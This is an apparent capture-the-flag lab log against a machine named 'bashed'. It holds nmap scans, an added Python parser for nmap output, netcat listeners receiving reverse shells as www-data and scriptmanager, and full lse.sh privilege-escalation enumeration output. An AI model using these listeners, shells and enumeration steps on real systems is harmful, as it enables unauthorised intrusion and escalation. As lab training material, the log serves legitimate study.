┌──(kali㉿offsec)-[~/Desktop]
└─$ sudo nmap -p- --min-rate=10000 -oG allports 10.10.10.68
[sudo] kali 的密码:
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-19 23:11 CST
Warning: 10.10.10.68 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.10.10.68
Host is up (0.32s latency).
Not shown: 64287 closed tcp ports (reset), 1247 filtered tcp ports (no-response)
PORT   STATE SERVICE
80/tcp open  http

Nmap done: 1 IP address (1 host up) scanned in 43.88 seconds

┌──(kali㉿offsec)-[~/Desktop]
└─$ sudo nmap -p- --min-rate=10000 -oG allports1 10.10.10.68 -sU
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-19 23:13 CST
Warning: 10.10.10.68 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.10.10.68
Host is up (0.43s latency).
All 65535 scanned ports on 10.10.10.68 are in ignored states.
Not shown: 65444 open|filtered udp ports (no-response), 91 closed udp ports (port-unreach)

Nmap done: 1 IP address (1 host up) scanned in 78.15 seconds

┌──(kali㉿offsec)-[~/Desktop]
└─$ sudo nmap -p80 --min-rate=10000 10.10.10.68 -sV -sC
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-19 23:26 CST
Nmap scan report for 10.10.10.68
Host is up (1.2s latency).

PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Arrexel's Development Site
|_http-server-header: Apache/2.4.18 (Ubuntu)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 19.73 seconds
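The three scans above follow a two-stage pattern: a fast full-range TCP scan and a UDP scan written to grepable files (-oG allports, allports1), then a targeted -sV -sC run against the one port found open. As an added example, not part of the original writeup, here is a Python parser for the -oG format that pulls the open ports out of such a file and builds the -p argument for the second stage; the sample inputs are constructed, modelled on the results above, and include the UDP case where no port is reported at all.

```python
import re

# Constructed sample of nmap -oG output modelled on the TCP scan above (port 80
# open, the rest ignored), plus a filtered port and a down host for the parser.
SAMPLE_OG = """\
# Nmap 7.94SVN scan initiated Sun May 19 23:11:00 2024 as: nmap -p- --min-rate=10000 -oG allports 10.10.10.68
Host: 10.10.10.68 ()\tStatus: Up
Host: 10.10.10.68 ()\tPorts: 80/open/tcp//http///, 22/filtered/tcp//ssh///\tIgnored State: closed (64287)
Host: 10.10.10.69 ()\tStatus: Down
# Nmap done at Sun May 19 23:11:44 2024 -- 2 IP addresses (1 host up) scanned in 43.88 seconds
"""

# Constructed UDP-scan case: every port ignored, so the host line has no 'Ports:' field.
SAMPLE_OG_UDP = """\
Host: 10.10.10.68 ()\tStatus: Up
Host: 10.10.10.68 ()\tIgnored State: open|filtered (65444)
"""

HOST_RE = re.compile(r"^Host:\s+(\S+)\s+\(([^)]*)\)")

def parse_grepable(text):
    """Return {host: [(port, proto, state, service), ...]} from -oG text.
    Comment lines are skipped; a host without 'Ports:' gets an empty list."""
    results = {}
    for line in text.splitlines():
        m = HOST_RE.match(line)
        if not m:
            continue                                  # '# Nmap ...' comment line
        ports = results.setdefault(m.group(1), [])
        for field in line.split("\t")[1:]:            # Status / Ports / Ignored State
            if not field.startswith("Ports:"):
                continue
            for entry in field[len("Ports:"):].split(","):
                parts = entry.strip().split("/")      # port/state/proto/owner/service/rpc/version/
                if len(parts) < 5:
                    continue                          # malformed entry, ignore
                port, state, proto, _owner, service = parts[:5]
                ports.append((int(port), proto, state, service))
    return results

def open_ports(parsed, host, proto="tcp"):
    """Sorted ports in state 'open' for one host and protocol."""
    return sorted(p for p, pr, st, _ in parsed.get(host, []) if pr == proto and st == "open")

def service_scan_ports(parsed, host, proto="tcp"):
    """-p argument for the follow-up 'nmap -sV -sC' run, or None if nothing is open."""
    ports = open_ports(parsed, host, proto)
    return "-p" + ",".join(str(p) for p in ports) if ports else None
```

Run against the constructed TCP sample, service_scan_ports returns "-p80", matching the third scan above; against the UDP sample it returns None because nothing was confirmed open.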
┌──(kali㉿offsec)-[~/Desktop]
└─$ rlwrap nc -lnvp 443
listening on [any] 443 ...
connect to [10.10.14.45] from (UNKNOWN) [10.10.10.68] 34302
bash: cannot set terminal process group (821): Inappropriate ioctl for device
bash: no job control in this shell
www-data@bashed:/var/www/html/uploads$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@bashed:/var/www/html/uploads$

OS: Linux version 4.4.0-62-generic (buildd@lcy01-30) (gcc version 5.4.0 20160609 (Ubuntu 5.4.0-6ubuntu1~16.04.4) ) #83-Ubuntu SMP Wed Jan 18 14:10:15 UTC 2017

listening on [any] 4444 ...
connect to [10.10.14.45] from (UNKNOWN) [10.10.10.68] 60220
bash: cannot set terminal process group (821): Inappropriate ioctl for device
bash: no job control in this shell
scriptmanager@bashed:/var/www/html/uploads$ id
id
uid=1001(scriptmanager) gid=1001(scriptmanager) groups=1001(scriptmanager)
scriptmanager@bashed:/var/www/html/uploads$
scriptmanager@bashed:~$ chmod +x lse.sh
chmod +x lse.sh
scriptmanager@bashed:~$ ./lse.sh
--- If you know the current user password, write it here to check sudo privileges: ---

=====================( Current Output Verbosity Level: 0 )======================
===============================================================( humanity )=====
[!] nowar0 Should we question autocrats and their "military operations"?... yes!
--- NO WAR ---
==================================================================( users )=====
[i] usr000 Current user groups............................................. yes!
[*] usr010 Is current user in an administrative group?..................... nope
[*] usr020 Are there other users in administrative groups?................. yes!
[*] usr030 Other users with shell.......................................... yes!
[i] usr040 Environment information......................................... skip
[i] usr050 Groups for other users.......................................... skip
[i] usr060 Other users..................................................... skip
[*] usr070 PATH variables defined inside /etc.............................. yes!
[!] usr080 Is '.' in a PATH variable defined inside /etc?.................. nope
===================================================================( sudo )=====
[!] sud000 Can we sudo without a password?................................. nope
[!] sud010 Can we list sudo commands without a password?................... nope
[*] sud040 Can we read sudoers files?...................................... nope
[*] sud050 Do we know if any other users used sudo?........................ yes!
============================================================( file system )=====
[*] fst000 Writable files outside user's home.............................. yes!
[*] fst010 Binaries with setuid bit........................................ yes!
[!] fst020 Uncommon setuid binaries........................................ yes!
--- /usr/bin/vmware-user-suid-wrapper ---
[!] fst030 Can we write to any setuid binary?.............................. nope
[*] fst040 Binaries with setgid bit........................................ skip
[!] fst050 Uncommon setgid binaries........................................ skip
[!] fst060 Can we write to any setgid binary?.............................. skip
[*] fst070 Can we read /root?.............................................. nope
[*] fst080 Can we read subdirectories under /home?......................... yes!
[*] fst090 SSH files in home directories................................... nope
[*] fst100 Useful binaries................................................. yes!
[*] fst110 Other interesting files in home directories..................... nope
[!] fst120 Are there any credentials in fstab/mtab?........................ nope
[*] fst130 Does 'scriptmanager' have mail?................................. nope
[!] fst140 Can we access other users mail?................................. nope
[*] fst150 Looking for GIT/SVN repositories................................ nope
[!] fst160 Can we write to critical files?................................. nope
[!] fst170 Can we write to critical directories?........................... nope
[!] fst180 Can we write to directories from PATH defined in /etc?.......... nope
[!] fst190 Can we read any backup?......................................... nope
[!] fst200 Are there possible credentials in any shell history file?....... nope
[!] fst210 Are there NFS exports with 'no_root_squash' option?............. nope
[*] fst220 Are there NFS exports with 'no_all_squash' option?.............. nope
[i] fst500 Files owned by user 'scriptmanager'............................. skip
[i] fst510 SSH files anywhere.............................................. skip
[i] fst520 Check hosts.equiv file and its contents......................... skip
[i] fst530 List NFS server shares.......................................... skip
[i] fst540 Dump fstab file................................................. skip
=================================================================( system )=====
[i] sys000 Who is logged in................................................ skip
[i] sys010 Last logged in users............................................ skip
[!] sys020 Does the /etc/passwd have hashes?............................... nope
[!] sys022 Does the /etc/group have hashes?................................ nope
[!] sys030 Can we read shadow files?....................................... nope
[*] sys040 Check for other superuser accounts.............................. nope
[*] sys050 Can root user log in via SSH?................................... nope
[i] sys060 List available shells........................................... skip
[i] sys070 System umask in /etc/login.defs................................. skip
[i] sys080 System password policies in /etc/login.defs..................... skip
===============================================================( security )=====
[*] sec000 Is SELinux present?............................................. nope
[*] sec010 List files with capabilities.................................... yes!
[!] sec020 Can we write to a binary with caps?............................. nope
[!] sec030 Do we have all caps in any binary?.............................. nope
[*] sec040 Users with associated capabilities.............................. nope
[!] sec050 Does current user have capabilities?............................ skip
[!] sec060 Can we read the auditd log?..................................... nope
========================================================( recurrent tasks )=====
[*] ret000 User crontab.................................................... nope
[!] ret010 Cron tasks writable by user..................................... nope
[*] ret020 Cron jobs....................................................... yes!
[*] ret030 Can we read user crontabs....................................... nope
[*] ret040 Can we list other user cron tasks?.............................. nope
[*] ret050 Can we write to any paths present in cron jobs.................. nope
[!] ret060 Can we write to executable paths present in cron jobs........... skip
[i] ret400 Cron files...................................................... skip
[*] ret500 User systemd timers............................................. nope
[!] ret510 Can we write in any system timer?............................... nope
[i] ret900 Systemd timers.................................................. skip
================================================================( network )=====
[*] net000 Services listening only on localhost............................ nope
[!] net010 Can we sniff traffic with tcpdump?.............................. nope
[i] net500 NIC and IP information.......................................... skip
[i] net510 Routing table................................................... skip
[i] net520 ARP table....................................................... skip
[i] net530 Nameservers..................................................... skip
[i] net540 Systemd Nameservers............................................. skip
[i] net550 Listening TCP................................................... skip
[i] net560 Listening UDP................................................... skip
===============================================================( services )=====
[!] srv000 Can we write in service files?.................................. nope
[!] srv010 Can we write in binaries executed by services?.................. nope
[*] srv020 Files in /etc/init.d/ not belonging to root..................... nope
[*] srv030 Files in /etc/rc.d/init.d not belonging to root................. nope
[*] srv040 Upstart files not belonging to root............................. nope
[*] srv050 Files in /usr/local/etc/rc.d not belonging to root.............. nope
[i] srv400 Contents of /etc/inetd.conf..................................... skip
[i] srv410 Contents of /etc/xinetd.conf.................................... skip
[i] srv420 List /etc/xinetd.d if used...................................... skip
[i] srv430 List /etc/init.d/ permissions................................... skip
[i] srv440 List /etc/rc.d/init.d permissions............................... skip
[i] srv450 List /usr/local/etc/rc.d permissions............................ skip
[i] srv460 List /etc/init/ permissions..................................... skip
[!] srv500 Can we write in systemd service files?.......................... nope
[!] srv510 Can we write in binaries executed by systemd services?.......... nope
[*] srv520 Systemd files not belonging to root............................. nope
[i] srv900 Systemd config files permissions................................ skip
===============================================================( software )=====
[!] sof000 Can we connect to MySQL with root/root credentials?............. nope
[!] sof010 Can we connect to MySQL as root without password?............... nope
[!] sof015 Are there credentials in mysql_history file?.................... nope
[!] sof020 Can we connect to PostgreSQL template0 as postgres and no pass?. nope
[!] sof020 Can we connect to PostgreSQL template1 as postgres and no pass?. nope
[!] sof020 Can we connect to PostgreSQL template0 as psql and no pass?..... nope
[!] sof020 Can we connect to PostgreSQL template1 as psql and no pass?..... nope
[*] sof030 Installed apache modules........................................ yes!
[!] sof040 Found any .htpasswd files?...................................... nope
[!] sof050 Are there private keys in ssh-agent?............................ nope
[!] sof060 Are there gpg keys cached in gpg-agent?......................... nope
[!] sof070 Can we write to a ssh-agent socket?............................. nope
[!] sof080 Can we write to a gpg-agent socket?............................. nope
[!] sof090 Found any keepass database files?............................... nope
[!] sof100 Found any 'pass' store directories?............................. nope
[!] sof110 Are there any tmux sessions available?.......................... nope
[*] sof120 Are there any tmux sessions from other users?................... nope
[!] sof130 Can we write to tmux session sockets from other users?.......... nope
[!] sof140 Are any screen sessions available?.............................. nope
[*] sof150 Are there any screen sessions from other users?................. nope
[!] sof160 Can we write to screen session sockets from other users?........ nope
[*] sof170 Can we access MongoDB databases without credentials?............ nope
[!] sof180 Can we access any Kerberos credentials?......................... nope
[i] sof500 Sudo version.................................................... skip
[i] sof510 MySQL version................................................... skip
[i] sof520 Postgres version................................................ skip
[i] sof530 Apache version.................................................. skip
[i] sof540 Tmux version.................................................... skip
[i] sof550 Screen version.................................................. skip
=============================================================( containers )=====
[*] ctn000 Are we in a docker container?................................... nope
[*] ctn010 Is docker available?............................................ nope
[!] ctn020 Is the user a member of the 'docker' group?..................... nope
[*] ctn200 Are we in a lxc container?...................................... nope
[!] ctn210 Is the user a member of any lxc/lxd group?...................... nope
==============================================================( processes )=====
[i] pro000 Waiting for the process monitor to finish....................... yes!
[i] pro001 Retrieving process binaries..................................... yes!
[i] pro002 Retrieving process users........................................ yes!
[!] pro010 Can we write in any process binary?............................. nope
[*] pro020 Processes running with root permissions......................... yes!
[*] pro030 Processes running by non-root users with shell.................. yes!
[i] pro500 Running processes............................................... skip
[i] pro510 Running process binaries and permissions........................ skip
===================================================================( CVEs )=====
In order to test for CVEs, download lse.sh from the GitHub releases page.
Alternatively, build lse_cve.sh using tools/package_cvs_into_lse.sh from the repository.
==================================( FINISHED )==================================